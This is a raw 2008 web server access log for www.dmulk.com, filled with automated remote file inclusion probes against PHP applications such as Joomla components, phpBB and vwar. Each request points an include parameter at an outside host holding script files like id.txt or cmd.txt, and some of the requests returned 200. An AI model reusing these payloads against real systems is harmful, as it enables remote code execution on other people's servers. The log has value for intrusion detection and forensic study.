217.67.26.84 - - [16/May/2008:12:17:18 -0700] "GET /index1.php?menu=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [16/May/2008:12:17:18 -0700] "GET /index1.php?menu=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.43 - - [16/May/2008:12:18:06 -0700] "GET /logs/config.php?path_to_root=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.43 - - [16/May/2008:12:18:06 -0700] "GET /config.php?path_to_root=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [16/May/2008:12:18:07 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [16/May/2008:12:18:07 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:12:18:14 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:12:18:15 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.230.148.86 - - [16/May/2008:12:19:10 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [16/May/2008:12:19:11 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.230.148.86 - - [16/May/2008:12:19:11 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:12:19:13 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:12:19:13 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.campuswatch.net/calendar//tools/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:12:19:16 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.47.201.117 - - [16/May/2008:12:19:24 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [16/May/2008:12:19:24 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [16/May/2008:12:19:24 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:19:25 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:19:26 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:12:19:27 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.66.83 - - [16/May/2008:12:19:28 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://www.tukangbecak.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [16/May/2008:12:19:38 -0700] "GET //application/include/modules/area/api_link.php?link=organisation&sub_link=profile&xml_paramsorganisationinfo0classification=1&cfgfile=http://www.lopesgarcia.pt/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
89.42.133.2 - - [16/May/2008:12:19:39 -0700] "GET /logs//application/include/modules/area/api_link.php?link=organisation&sub_link=profile&xml_paramsorganisationinfo0classification=1&cfgfile=http://www.lopesgarcia.pt/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:12:19:42 -0700] "GET /logs/access_080327.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.74.196.80 - - [16/May/2008:12:19:43 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.74.196.80 - - [16/May/2008:12:19:43 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.74.196.80 - - [16/May/2008:12:19:43 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:12:19:52 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:12:19:52 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:12:19:52 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:12:19:52 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:12:19:52 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:12:19:52 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:19:54 -0700] "GET /logs//main.php?sayfa=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:19:54 -0700] "GET //main.php?sayfa=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.217.194 - - [16/May/2008:12:20:53 -0700] "GET /logs//main.php?sayfa=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.225.217.194 - - [16/May/2008:12:20:53 -0700] "GET //main.php?sayfa=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:12:20:55 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.12.23 - - [16/May/2008:12:21:01 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://maniamediapass.com/ct/dat/62800.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
195.225.171.182 - - [16/May/2008:12:21:06 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.225.171.182 - - [16/May/2008:12:21:06 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.108.66.83 - - [16/May/2008:12:21:11 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://www.tukangbecak.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [16/May/2008:12:21:17 -0700] "GET /logs//main.php?sayfa=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [16/May/2008:12:21:18 -0700] "GET //main.php?sayfa=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
222.124.213.71 - - [16/May/2008:12:21:27 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.geocities.com/elmaalia/maknyus.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.124.213.71 - - [16/May/2008:12:21:28 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.geocities.com/elmaalia/maknyus.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [16/May/2008:12:21:29 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.51.45 - - [16/May/2008:12:21:30 -0700] "GET /logs//main.php?sayfa=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [16/May/2008:12:21:30 -0700] "GET //main.php?sayfa=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.74.196.80 - - [16/May/2008:12:21:43 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.85.130.159 - - [16/May/2008:12:21:51 -0700] "GET /logs/access_080218.log//?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.85.130.159 - - [16/May/2008:12:21:57 -0700] "GET //?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
195.85.130.159 - - [16/May/2008:12:21:58 -0700] "GET /logs//?mosConfig_absolute_path=http://www.jgpons.com/images/prc.png? HTTP/1.1" 200 47704 "-" "libwww-perl/5.803" "www.dmulk.com"
151.11.24.250 - - [16/May/2008:12:22:24 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [16/May/2008:12:22:24 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:12:22:31 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:12:22:31 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [16/May/2008:12:22:50 -0700] "GET /logs/str.php?p=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [16/May/2008:12:22:50 -0700] "GET /str.php?p=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.229 - - [16/May/2008:12:22:52 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.229 - - [16/May/2008:12:22:52 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.229 - - [16/May/2008:12:22:52 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.229 - - [16/May/2008:12:22:52 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [16/May/2008:12:23:06 -0700] "GET /logs/str.php?page=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [16/May/2008:12:23:06 -0700] "GET /str.php?page=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:12:23:17 -0700] "GET /logs/config.php?path_to_root=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:12:23:18 -0700] "GET /config.php?path_to_root=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:23:26 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:23:26 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:23:27 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
72.47.201.117 - - [16/May/2008:12:23:39 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:12:24:09 -0700] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:12:24:10 -0700] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:12:24:12 -0700] "GET /logs/access_080128.log//skins/advanced/advanced1.php?pluginpath[0]=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:12:24:12 -0700] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:12:24:13 -0700] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.34.226.62 - - [16/May/2008:12:24:15 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/mrasafira/kasih.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:12:24:17 -0700] "GET /logs/access_080209.log//skins/advanced/advanced1.php?pluginpath[0]=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
160.99.12.231 - - [16/May/2008:12:24:17 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://83.222.131.90/~legitimi/mybase/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
160.99.12.231 - - [16/May/2008:12:24:17 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://83.222.131.90/~legitimi/mybase/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:12:24:27 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:12:24:27 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:12:24:27 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:24:39 -0700] "GET /logs/access_080418.log//citywriter/head.php?path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:24:40 -0700] "GET //citywriter/head.php?path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:24:41 -0700] "GET /logs//citywriter/head.php?path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:12:24:44 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.55.211.31 - - [16/May/2008:12:24:52 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.31 - - [16/May/2008:12:24:52 -0700] "GET /plans/?M=D HTTP/1.1" 200 1111 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
77.48.10.14 - - [16/May/2008:12:24:56 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.mas-manos.com.mx/images/banners/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.10.14 - - [16/May/2008:12:24:57 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.mas-manos.com.mx/images/banners/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:12:24:59 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:12:25:00 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.48.10.14 - - [16/May/2008:12:25:00 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.mas-manos.com.mx/images/banners/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:12:25:00 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:25:10 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:25:11 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:25:12 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:25:28 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [16/May/2008:12:25:34 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://raybrothers.org/images/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:12:26:25 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:12:26:25 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:12:26:25 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:12:26:26 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:12:26:26 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.241.54.4 - - [16/May/2008:12:26:26 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.erasethedark.com/dlk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:26:32 -0700] "GET /logs/access_080322.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:26:32 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:26:32 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
216.17.101.27 - - [16/May/2008:12:26:41 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [16/May/2008:12:26:41 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [16/May/2008:12:26:41 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.246.154.12 - - [16/May/2008:12:26:46 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [16/May/2008:12:26:46 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [16/May/2008:12:26:46 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://www.jgpons.com/images/prc.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:26:55 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:12:26:55 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
